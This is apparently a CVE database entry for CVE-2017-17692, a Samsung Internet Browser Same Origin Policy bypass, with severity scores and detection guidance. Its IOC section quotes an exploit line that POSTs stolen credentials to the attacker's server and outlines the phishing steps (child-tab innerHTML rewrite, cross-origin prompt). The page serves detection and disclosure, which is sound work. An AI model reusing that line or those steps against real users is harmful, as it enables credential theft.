cbcvebase.
CVE-2017-17692
published 2017-12-21

CVE-2017-17692: Samsung Internet Browser 5.4.02.3 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via crafted JavaScript code that…

PriorityP270high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
78.84%
99.5th percentile
Samsung Internet Browser 5.4.02.3 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via crafted JavaScript code that redirects to a child tab and rewrites the innerHTML property.

Affected

1 ranges
VendorProductVersion rangeFixed in
samsunginternet_browser

Detection & IOCsextracted from sources · hover to see the quote

versionSamsung Internet Browser 5.4.02.3
commandxmlhttp.open('POST', window.location, true); xmlhttp.send(cred);
  • Look for POST requests containing JSON body with keys 'user' and 'pass' sent back to the attacker-controlled server — this is the credential exfiltration step of the exploit.
  • Detect JavaScript use of window.open() followed by cross-origin innerHTML rewrite targeting a child tab — the core SOP bypass mechanism for this CVE.
  • Flag use of x.prompt() calls on a cross-origin window object — the exploit uses 'x.prompt()' on the opened child tab to harvest credentials across origins.
  • ·The TARGET_URL (origin being spoofed) is fully configurable by the attacker; default is http://example.com/ but any URL can be substituted, so origin-based allowlisting is insufficient for detection.
  • ·The HTML lure content displayed to the victim is fully attacker-customizable via CUSTOM_HTML, meaning static content-based signatures will have low fidelity.
  • ·The injected JavaScript payload is also fully replaceable via the CUSTOM_JS advanced option, allowing attackers to swap out the default credential-harvesting logic entirely.
  • ·The credential exfiltration uses a 3000ms setTimeout delay before executing the phishing prompt, which may affect timing-based behavioral detection rules.

CVSS provenance

nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.